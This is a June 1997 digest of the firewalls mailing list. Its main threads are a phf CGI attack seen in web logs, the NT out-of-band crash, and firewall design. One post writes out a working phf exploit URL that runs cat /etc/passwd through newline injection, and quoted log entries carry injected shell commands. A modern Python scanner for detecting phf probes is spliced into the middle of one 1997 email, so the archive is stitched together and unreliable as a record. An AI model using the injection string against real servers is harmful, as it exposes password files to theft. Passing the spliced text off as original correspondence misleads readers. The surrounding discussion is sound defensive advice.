Received: from challenger.atc.fhda.edu (challenger.atc.fhda.edu [153.18.200.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA13891 for ; Thu, 5 Jun 1997 10:04:30 -0700 (PDT)
Received: from localhost (manek@localhost) by challenger.atc.fhda.edu (8.8.0/8.7.3) with SMTP id KAA10423; Thu, 5 Jun 1997 10:08:27 -0700 (PDT)
Date: Thu, 5 Jun 1997 10:08:26 -0700 (PDT)
From: "Sameer R.
Manek"
To: Stan Wnuck
cc: firewalls@GreatCircle.COM
Subject: Re: psswd HACK
In-Reply-To: <199706051407.HAA20909@honor.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

This is how the exploit is done

    http://"name of server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

But that's not really important. Let's assume they got your passwd file. That means they have the option to crack on that passwd file; let's assume they did that too. They in theory know the login and password of everyone on that machine. I'll bet the login names and passwords of people on your webserver are the same as their login/password on other machines on your network. Does this cause concern? It should. Given the fact that they ran the phf script in April, they've had at least a month to run crack.

Assume that your webserver has been compromised and they have had a sniffer running on that box for a month, what would you do?
You need to think about the worst-case scenario and work backwards instead of thinking 'oh all they got was my password file'.

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sameer Manek                      manek@challenger.atc.fhda.edu
The last four line .signature file on the entire internet
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From owner-firewalls-outgoing Thu Jun 5 12:02:33 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA24820 for firewalls-outgoing; Thu, 5 Jun 1997 08:03:32 -0700 (PDT)
Received: from diderot.sibernet.com.tr (sb-router.sibernet.com.tr [195.142.229.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA24592 for ; Thu, 5 Jun 1997 08:01:10 -0700 (PDT)
Received: from localhost (root@localhost) by diderot.sibernet.com.tr (8.8.5/8.6.9) with SMTP id SAA04125; Thu, 5 Jun 1997 18:05:24 +0300
Date: Thu, 5 Jun 1997 18:05:24 +0300 (EET DST)
From: Root Admin-KSoft
X-Sender: root@diderot
To: Stan Wnuck
cc: Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 4 Jun 1997, Stan Wnuck wrote:
> Hi all,
>
> I have noticed on my WWW log files the following 2 entries.
>
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140

Since result code is 200 (success) it seems that you have phf; pls disable it asap. Go to cgi-bin directory and do a chmod 0 phf...

Pls. refer to my previous mail also.
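The thread above turns on two things a defender can check in the web logs: whether the request carried a URL-encoded newline (%0A) into phf's query string, and whether the server answered 200 (the script exists and ran) rather than 404. The following is an added example, not code from any poster on the list; it parses Common Log Format lines constructed from the entries quoted in this thread (the remote host was already redacted by the original poster) and flags phf/php.cgi probes and what they asked for.

```python
"""Flag phf / php.cgi probes in NCSA/Apache Common Log Format lines.

Added example; not from any message on the firewalls list. The sample
log lines are constructed from the entries quoted in the thread.
"""
import re
from urllib.parse import unquote

# Common Log Format: host ident user [time] "request" status bytes
# The request may lack a protocol token (the php.cgi entry in the thread has none).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]*)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>\S+))?" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# CGI programs the thread identifies as dangerous on 1997-era NCSA/Apache installs.
SUSPECT_CGI = ("/cgi-bin/phf", "/cgi-bin/php.cgi")

# phf's bug: an encoded newline in the query reaches the shell as a command separator.
NEWLINE_INJECTION = re.compile(r"[\r\n]")
# Strings that mark a request as going after account data rather than a directory lookup.
SENSITIVE = ("/etc/passwd", "/etc/shadow", "ypcat")


def analyze(line):
    """Return a finding dict for a phf/php.cgi request, or None for anything else."""
    m = LOG_RE.match(line)
    if not m:
        return None
    script, _, query = m.group("path").partition("?")
    if not any(script.startswith(s) for s in SUSPECT_CGI):
        return None
    decoded = unquote(query)          # %0A -> "\n", %20 -> " "
    findings = []
    if NEWLINE_INJECTION.search(decoded):
        findings.append("newline injection (%0A) in query")
    for s in SENSITIVE:
        if s in decoded:
            findings.append("references " + s)
    status = int(m.group("status"))
    return {
        "host": m.group("host"),
        "time": m.group("time"),
        "script": script,
        "status": status,
        # Kerem's point: 200 means the script is installed and ran; 404 means it is absent.
        "script_present": status == 200,
        "findings": findings,
        "decoded_query": decoded,
    }


def scan(lines):
    """Run analyze() over an iterable of log lines and keep only the hits."""
    return [r for r in (analyze(l) for l in lines) if r]


# Constructed sample log: one ordinary request, the two entries quoted in the
# thread, and a benign-looking phf lookup (phf is still worth removing even then).
SAMPLE_LOG = [
    'some.remote.location.edu - - [28/Apr/1997:01:33:20 +0015] "GET /index.html HTTP/1.0" 200 2048',
    'some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu'
    '%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname='
    '&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140',
    'some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143',
    'some.remote.location.edu - - [29/Apr/1997:09:12:02 +0015] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 512',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        verdict = "SCRIPT PRESENT" if hit["script_present"] else "script absent"
        print(f'{hit["time"]} {hit["host"]} {hit["script"]} -> {hit["status"]} ({verdict})')
        for f in hit["findings"]:
            print("    " + f)
```

Any phf hit with `script_present` true is the case the thread is about: the script is installed and reachable, so the advice in the thread (remove or `chmod 0 phf`, then assume the passwd file is out and rotate credentials) applies whether or not the particular request looked benign.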
Best Regards
Kerem ERSOY

> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
>
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?
>
> I changed the real source location to a fake some.remote.location.edu to not let out the bag of the source of this hack, since I am not sure what my next move would be.

OK but your e-mail address is probably giving your some.remote.site isn't it :)

> Thanks in advance.
>
> Stan Wnuck swnuck@unixpros.com
> Unixpros, Inc.
> 10 Industrial Way East (908) 389-3295 x542
> Eatontown, NJ 07724 (908) 389-5461 Fax
>
> PM-CHS Technology Insertion Office
> Ft. Monmouth Army Base, NJ (908) 427-2033 / 427-6963

+----------------------------------------------------
sibernet internet security experts
and sokak 8/1 cankaya ankara turkiye 06680
tel : +90-312-4670198 (pbx) fax: +90-312-4670199
http://www.sibernet.com.tr/ mail: info@sibernet.com.tr

From owner-firewalls-outgoing Thu Jun 5 12:20:02 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA18788 for firewalls-outgoing; Thu, 5 Jun 1997 10:30:19 -0700 (PDT)
Received: from newfed.frb.gov (newfed.frb.gov [198.3.221.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA18730 for ; Thu, 5 Jun 1997 10:30:04 -0700 (PDT)
Received: from FRB.GOV (umailfwd@localhost) by newfed.frb.gov (8.8.5/8.8.5) with UUCP id NAA23124; Thu, 5 Jun 1997 13:13:10 -0400 (EDT)
Received: from kryten.frb.gov by frbgate.FRB.GOV (4.1/SMI-4.0) id AA16199; Thu, 5 Jun 97 13:18:51 EDT
Received: from localhost.frb.gov (localhost.frb.gov [127.0.0.1]) by kryten.frb.gov (8.8.5/8.8.5) with SMTP id NAA08468; Thu, 5 Jun 1997 13:18:51 -0400 (EDT)
Message-Id: <199706051718.NAA08468@kryten.frb.gov>
X-Authentication-Warning: kryten.frb.gov: localhost.frb.gov [127.0.0.1] didn't use HELO protocol
X-Mailer: exmh version 1.6.5 12/11/95
To: Cy Ardoin
Cc: Firewalls@GreatCircle.COM
Subject: Re: PIX and FW-1 (packet filter Question)
In-Reply-To: Your message of "Wed, 04 Jun 1997 19:45:07 EDT."
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Date: Thu, 05 Jun 1997 13:18:49 -0400
From: "Jonathan M. Bresler"
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

>I don't think there is anything an application firewall can do that can't also be done by a "packet filter" firewall.

The trivial example: a smtp application level proxy can disable the "debug" command for every sendmail behind that firewall.

>new packet filter firewalls are not like the old Cisco/Bay router filters. The new systems operate at the network layer, but they have knowledge of the protocols and applications. They open up the packets and modify the data. These systems are doing content filtering and other "application" types of operations. Yes, not all of them do these things, but many do, and new feature/functions are being added to these systems every year.

jmb
--
Jonathan M. Bresler   202-452-2831   breslerj@frb.gov   MS-169
Federal Reserve Board of Governors   Washington DC 20551
Speaking for myself.
Others speak for the Federal Reserve Board of Governors

From owner-firewalls-outgoing Thu Jun 5 13:04:16 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13650 for firewalls-outgoing; Thu, 5 Jun 1997 10:02:42 -0700 (PDT)
Received: from tlingit.elmail.co.uk (tlingit.elmail.co.uk [193.122.233.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA13612 for ; Thu, 5 Jun 1997 10:02:22 -0700 (PDT)
Received: from mojave.elmail.co.uk (mojave.elmail.co.uk [193.112.20.14]) by tlingit.elmail.co.uk with SMTP id SAA13564 (2.1.1h-8.8.5/2.1); Thu, 5 Jun 1997 18:08:50 +0100 (BST)
Date: Thu, 5 Jun 1997 18:00:14 +0100 (BST)
From: Daniel Strawson
To: Craig Brozefsky
cc: Jyri Kaljundi , Greg Loffel , fw-1-mailinglist@us.checkpoint.com, Firewalls mailing list
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
In-Reply-To:
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

OK, public apology time - I've taken a look at this again. The urgent point is not an IP option (as I had understood), but a TCP option. Hence, the 'IP Options' stuff in FW-1 doesn't apply and the packets will get through.

For the record, however, FW-1 does drop all packets with IP header options as none of these should be used nowadays (manual page 295).

Sorry for adding confusion.

Cheers,

Daniel

On Thu, 5 Jun 1997, Craig Brozefsky wrote:
> On Thu, 5 Jun 1997, Daniel Strawson wrote:
>
> > Hang on a moment.
> >
> > Let me put this in perspective.
> >
> > As I understand it, this problem results from sending packets with a particular IP option set in the header. (Please confirm I'm right here someone).
> >
> > Firewall _SHOULD_ drop all packets with IP options set. This would mean that all Firewall-1 systems and systems behind Firewall-1 are impervious to this attack. (something for Checkpoint to be proud of).
>
> Uhm, I don't have any RFCs or source code in front of me right now, but my understanding was that several options would need to get thru, OOB being one of them, as some applications make use of it, telnet for instance if I'm not mistaken (tho I may be and invite correction).
>
> > Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to crash, you get the NT system that it is running on to crash, so it is not an insecurity, but a claimed feature that doesn't work.
>
> Not how I would interpret it. I would consider this the responsibility of the FW vendor. They are responsible for the TCP/IP stack IMO. If they aren't replacing it, then they are assuming the OS vendor is competent, not something I would agree with.
>
> Craig Brozefsky craig@onshore.com
> onShore Inc. http://www.onshore.com/~craig
> Development Team p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Thu Jun 5 13:04:27 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id IAA01504 for firewalls-outgoing; Thu, 5 Jun 1997 08:52:04 -0700 (PDT)
Received: from zippy.radian.com (zippy.radian.com [129.160.16.4]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id IAA01422 for ; Thu, 5 Jun 1997 08:51:40 -0700 (PDT)
Received: from ccsmtpgate.radian.com (ccsmtpgate.radian.com [129.160.224.126]) by zippy.radian.com (8.8.5/8.8.5) with SMTP id KAA16712 for ; Thu, 5 Jun 1997 10:53:55 -0500 (CDT)
Received: from ccMail by ccsmtpgate.radian.com (IMA Internet Exchange 2.1 Enterprise) id 000D79B8; Thu, 5 Jun 97 10:54:46 -0500
Mime-Version: 1.0
Date: Thu, 5 Jun 1997 10:51:53 -0500
Message-ID: <000D79B8.3356@radian.com>
From: Mark_Flanagan@radian.com (Mark Flanagan)
Subject: Microsoft NetMeeting
To: firewalls@greatcircle.com
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Description: cc:Mail note part
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

Does anyone have or can
you point me to a site with the particulars on Microsoft NetMeeting. I'm looking for the protocol, ports, security risks, etc.

Thanks in advance.

Mark Flanagan
mark_flanagan@radian.com

From owner-firewalls-outgoing Thu Jun 5 13:17:45 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id HAA23912 for firewalls-outgoing; Thu, 5 Jun 1997 07:53:29 -0700 (PDT)
Received: from diderot.sibernet.com.tr (sb-router.sibernet.com.tr [195.142.229.88]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id HAA23816 for ; Thu, 5 Jun 1997 07:52:23 -0700 (PDT)
Received: from localhost (root@localhost) by diderot.sibernet.com.tr (8.8.5/8.6.9) with SMTP id RAA04099; Thu, 5 Jun 1997 17:56:27 +0300
Date: Thu, 5 Jun 1997 17:56:26 +0300 (EET DST)
From: Root Admin-KSoft
X-Sender: root@diderot
To: Arnaud Girsch
cc: Stan Wnuck , Firewalls@GreatCircle.COM
Subject: Re: getting passwd file via WWW
In-Reply-To: <199706042108.OAA27744@mail.marben.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 4 Jun 1997, Arnaud Girsch wrote:
> > > I have noticed on my WWW log files the following 2 entries.
> > >
> > > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> > > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143

Once all the httpd daemons came bundled with a script called phf. This script was initially designed to build a mechanism like finger + whois. But there's a bug in this phf script: when it is used as above it could print any file (in this case /etc/passwd!!!!) or run any command with root privilege. I mean somebody tried to hack your passwd file.
The best thing to do is to go to your cgi-bin directory and issue a "chmod 0 phf" and if you think you still need it pick a patched one. I can not remember where. But it means that definitely somebody tried to hack your system....

> > > Does anyone know anything about these cgi scripts or programs?
> > > Or how dangerous this is?
>
> These are well known cgi scripts containing security holes.
> The phf script coming with the default NCSA server is buggy, and should be disabled. (it allows execution of shell programs)
>
> Arnaud.
>
> --
> Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA
> agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/

+----------------------------------------------------
sibernet internet security experts
and sokak 8/1 cankaya ankara turkiye 06680
tel : +90-312-4670198 (pbx) fax: +90-312-4670199
http://www.sibernet.com.tr/ mail: info@sibernet.com.tr

From owner-firewalls-outgoing Thu Jun 5 15:08:36 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA13487 for firewalls-outgoing; Thu, 5 Jun 1997 10:01:38 -0700 (PDT)
Received: from gate.adtranz-signal.co.uk (gate.adtranz-signal.co.uk [171.29.54.135]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id KAA13383 for ; Thu, 5 Jun 1997 10:01:14 -0700 (PDT)
Received: from mail-server.ply.adtranz-signal.co.uk (mail-server.ply.adtranz-signal.co.uk [171.30.30.102]) by gate.adtranz-signal.co.uk (8.6.12/8.6.12) with SMTP id SAA10998; Thu, 5 Jun 1997 18:09:02 +0100
Received: from [171.30.30.104] by mail-server.ply.adtranz-signal.co.uk (SMTPD32-3.04) id AFBD48B0084; Thu, 05 Jun 1997 18:04:45 +0000
Received: by PAVPC.ply.adtranz-signal.co.uk with Microsoft Mail id <01BC71DA.F3A690C0@PAVPC.ply.adtranz-signal.co.uk>; Thu, 5 Jun 1997 18:04:46 -0000
Message-ID: <01BC71DA.F3A690C0@PAVPC.ply.adtranz-signal.co.uk>
From: Pete Vickers
To: Jyri Kaljundi , "'Bryan D.
Boyle'"
Cc: "firewalls@GreatCircle.COM"
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
Date: Thu, 5 Jun 1997 18:04:45 -0000
MIME-Version: 1.0
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

i was under the impression that since FW-1 only supported several net i/f cards that they rewrote the drivers for these, and thus managing to get between the OS and the card h/w.

[pls correct me if i'm wrong, this was only an assumption !]

Pete

----------
From: Bryan D. Boyle
Sent: 05 June 1997 13:46
To: Jyri Kaljundi
Cc: firewalls@GreatCircle.COM
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts

At 03:08 PM 6/5/97 +0300, you wrote:
>You mean you can crash and NT FW-1 by sending OOB data to it?!
>That's scary if it is true and should be addressed by Check Point ASAP!

It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, since the OS is not in their control. They can only operate (or be as secure as) at the least common denominator level of the underlying OS.

>What I have always thought of FW-1 is that it operates at quite low level inside the OS kernel, that as long as you filter everything the network bugs in the OS don't really matter, as the packets never reach FW-1.

Nothing except MS code operates in the NT kernel. This problem is with what happens when you send oob data to a stack (MS) that is tightly integrated with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS interface and control mechanism itself is crap.

Of course, on UN*X systems, this is not the case. This is a signal example of the difference between designing for peer review of your security model and designing for what gets good trade publication reviews.

>If sending some bytes of data to FW1 crashes it and the OS, this combination (FW1+NT) should not be used as a firewall solution at all.
>Maybe someone from CP could explain, how much do the bugs in the OS matter once FW1 is installed.

If there is an overall architectural problem with NT as it is, then the OS bugs matter A LOT. But, of course, those that say you can trust a black box solution since the vendors are trustworthy are quite quiet on this regard...

I would agree that you should ignore NT as an OS platform in a security solution right now.

Just my opinion, $.02 US, etc. Flames to /dev/null.

--
Bryan D. Boyle              | LOGICAL: bdboyle@att.com 201-386-8584
#include                    | VIRTUAL: http://www.access.digex.net/~bdboyle
AT&T Laboratories, Inc.     | PHYSICAL: Whippany, NJ
                            | HISTORICAL: HQ, 6th Battalion, Army of No. VA.
"What country can preserve its liberties, if its rulers are not warned from time to time, that its people preserve the spirit of resistance?" -Thomas Jefferson, 1787

From owner-firewalls-outgoing Thu Jun 5 16:44:35 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA09728 for firewalls-outgoing; Thu, 5 Jun 1997 09:39:56 -0700 (PDT)
Received: from gateway-out.corp.usweb.com (gateway-out.usweb.com [205.180.171.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id JAA09707 for ; Thu, 5 Jun 1997 09:39:40 -0700 (PDT)
Received: by gateway-out.corp.usweb.com; id IAA13653; Thu, 5 Jun 1997 08:49:03 -0700
Received: from mailhub.corp.usweb.com(172.16.1.11) by gateway-out.corp.usweb.com via smap (V3.1.1) id xma013578; Thu, 5 Jun 97 08:48:39 -0700
Received: by mailhub.corp.usweb.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BC7195.093A9030@mailhub.corp.usweb.com>; Thu, 5 Jun 1997 09:44:17 -0700
Message-ID:
From: Eric Tebelak
To: "'Daniel Strawson'" , "'Jyri Kaljundi'"
Cc: "'Greg Loffel'" , "'fw-1-mailinglist@us.checkpoint.com'" , "'Firewalls mailing list'"
Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
Date: Thu, 5 Jun 1997 09:44:16 -0700
X-Mailer: Microsoft Exchange Server Internet
Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's an excerpt from the readme file for the OOB data attack on NT: "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow." Microsoft Tech Support Installing the post SP3 OOB hotfix should correct this problem. Eric L. Tebelak NT Systems Engineer USWeb Corporation E-Mail: elt@usweb.com Web: http://www.usweb.com >-----Original Message----- >From: Daniel Strawson [SMTP:daniel@elmail.co.uk] >Sent: Thursday, June 05, 1997 6:25 AM >To: Jyri Kaljundi >Cc: Greg Loffel; fw-1-mailinglist@us.checkpoint.com; Firewalls mailing = list >Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts > > >Hang on a moment. > >Let me put this in perspective. > >As I understand it, this problem results from sending packets with a >particular IP option set in the header. (Please confirm I'm right here >someone). > >Firewall _SHOULD_ drop all packets with IP options set. This would = mean >that all Firewall-1 systems and systems behind Firewall-1 are = impervious >to this attack. (something for Checkpoint to be proud of). > >Unfortunately this is not the case - as I say I've managed to get NT to >crash with FW-1 installed. > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to >crash, you get the NT system that it is running on to crash, so it is = not >an insecurity, but a claimed feature that doesn't work. > >So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. 
> >Cheers, > >Daniel > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: >>=20 >> > We tried it and, yes we managed to crash an NT based Firewall-1 = system. >> > This is odd since (if memory serves) the packets should be dropped = on the >> > floor by the stateful inspection module. >>=20 >> You mean you can crash and NT FW-1 by sending OOB data to it?! >> That's scary if it is true and should be addressed by Check Point = ASAP! >>=20 >> What I have always thought of FW-1 is that it operates at quite low = level >> inside the OS kernel, that as long as you filter everything the = network >> bugs in the OS don't really matter, as the packets never reach FW-1.=20 >>=20 >> If sending some bytes of data to FW1 crashes it and the OS, this >> combination (FW1+NT) should not be used as a firewall solution at = all. May >> be someone from CP could explain, how much do the bugs in the OS = matter >> once FW1 is installed. >>=20 >> J=FCri >>=20 >>=20 From owner-firewalls-outgoing Thu Jun 5 16:53:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA01850 for firewalls-outgoing; Thu, 5 Jun 1997 14:27:59 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id OAA27801 for firewalls@greatcircle.com; Thu, 5 Jun 1997 14:06:20 -0700 (PDT) Received: from newton.ispgaya.pt (newton.ispgaya.pt [194.79.91.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA14205 for ; Thu, 5 Jun 1997 04:57:59 -0700 (PDT) Received: from localhost (pbrandao@localhost) by newton.ispgaya.pt (8.8.4/8.8.4) with SMTP id NAA01998 for ; Thu, 5 Jun 1997 13:04:13 +0100 Date: Thu, 5 Jun 1997 13:04:13 +0100 (WET DST) From: Paulo Brandao To: firewalls@GreatCircle.Com Subject: Help Linux Versus WindowsNT passwords Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, My name is Paulo Brandao, and 
i study in ISPGaya, here i am a system administrator of a Linux Machine. Well, i have a big problem, i have a windowsNT4 server and a Linux server, i have about 50 computers with windows95,and i use samba to give access to the homes in Linux, and this is working just fine, my problem is that i have hundreds of accounts and i must creat for each student an account in Linux and another in windowsNT, so each student as 2 password's. So i lost hours to creat and administrate these accounts. What i want to do is by someway to validate a login in the WindowsNT, or buy another server that uses the SMB protocol. I don't no if it is possibel because i have to change the login and passwd source code, but someone told me that that is possible to do using PAM. If someone now how or another way, i will apreciate. Sorry my english, and thank you for your help. Paulo Brandao *----------------------------------------------* | Paulo Brandao | | | | email : pbrandao@ispgaya.pt | | URL : www.ISPGaya.pt | | Home Page : www.ISPGaya.pt/users/pbrandao | | Profissao : Administrador | | Tecnico de Informatica | | Estudante de Eng. 
Informatica | *----------------------------------------------* From owner-firewalls-outgoing Thu Jun 5 16:54:04 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA14348 for firewalls-outgoing; Thu, 5 Jun 1997 10:07:44 -0700 (PDT) Received: from tlingit.elmail.co.uk (tlingit.elmail.co.uk [193.122.233.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA14274 for ; Thu, 5 Jun 1997 10:07:03 -0700 (PDT) Received: from mojave.elmail.co.uk (mojave.elmail.co.uk [193.112.20.14]) by tlingit.elmail.co.uk with SMTP id SAA13799 (2.1.1h-8.8.5/2.1); Thu, 5 Jun 1997 18:14:29 +0100 (BST) Date: Thu, 5 Jun 1997 18:05:54 +0100 (BST) From: Daniel Strawson To: Eric Tebelak cc: "'Jyri Kaljundi'" , "'Greg Loffel'" , "'fw-1-mailinglist@us.checkpoint.com'" , "'Firewalls mailing list'" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, I've just read the RFCs. I hadn't read this document, I had read other documents and had been given the impression that it was a IP option. I'll be more careful next time I read about these sorts of attack. Cheers, Daniel On Thu, 5 Jun 1997, Eric Tebelak wrote: > Here's an excerpt from the readme file for the OOB data attack on NT: >=20 > "A sender specifies "Out of Band" data by setting the URGENT bit flag in > the > TCP header. The receiver uses the URGENT POINTER to determine where in > the > segment the urgent data ends. Windows NT bugchecks when the URGENT > POINTER > points to the end of the frame and no normal data follows. Windows NT > expects normal data to follow." Microsoft Tech Support >=20 > Installing the post SP3 OOB hotfix should correct this problem. >=20 > Eric L. 
Tebelak > NT Systems Engineer > USWeb Corporation > E-Mail: elt@usweb.com > Web: http://www.usweb.com >=20 > >-----Original Message----- > >From:=09Daniel Strawson [SMTP:daniel@elmail.co.uk] > >Sent:=09Thursday, June 05, 1997 6:25 AM > >To:=09Jyri Kaljundi > >Cc:=09Greg Loffel; fw-1-mailinglist@us.checkpoint.com; Firewalls mailing= list > >Subject:=09RE: [FW1] Out of Band Data Attack against NT-Hosts > > > > > >Hang on a moment. > > > >Let me put this in perspective. > > > >As I understand it, this problem results from sending packets with a > >particular IP option set in the header. (Please confirm I'm right here > >someone). > > > >Firewall _SHOULD_ drop all packets with IP options set. This would mean > >that all Firewall-1 systems and systems behind Firewall-1 are impervious > >to this attack. (something for Checkpoint to be proud of). > > > >Unfortunately this is not the case - as I say I've managed to get NT to > >crash with FW-1 installed. > > > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > >crash, you get the NT system that it is running on to crash, so it is no= t > >an insecurity, but a claimed feature that doesn't work. > > > >So, either - > > > > - The IP Options drop code in FW-1 doesn't work. > > > > or > > > > - I do not properly understand this attack and it does not work as I > > imagine - in this case, please correct me. > > > >Cheers, > > > >Daniel > > > > > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > > > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: > >>=20 > >> > We tried it and, yes we managed to crash an NT based Firewall-1 syst= em. > >> > This is odd since (if memory serves) the packets should be dropped o= n the > >> > floor by the stateful inspection module. > >>=20 > >> You mean you can crash and NT FW-1 by sending OOB data to it?! > >> That's scary if it is true and should be addressed by Check Point ASAP= ! 
> >>=20 > >> What I have always thought of FW-1 is that it operates at quite low le= vel > >> inside the OS kernel, that as long as you filter everything the networ= k > >> bugs in the OS don't really matter, as the packets never reach FW-1.= =20 > >>=20 > >> If sending some bytes of data to FW1 crashes it and the OS, this > >> combination (FW1+NT) should not be used as a firewall solution at all.= May > >> be someone from CP could explain, how much do the bugs in the OS matte= r > >> once FW1 is installed. > >>=20 > >> J=FCri > >>=20 > >>=20 >=20 From owner-firewalls-outgoing Thu Jun 5 16:56:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA17405 for firewalls-outgoing; Thu, 5 Jun 1997 13:10:23 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA17304 for ; Thu, 5 Jun 1997 13:10:04 -0700 (PDT) Message-Id: <199706052010.NAA17304@honor.greatcircle.com> 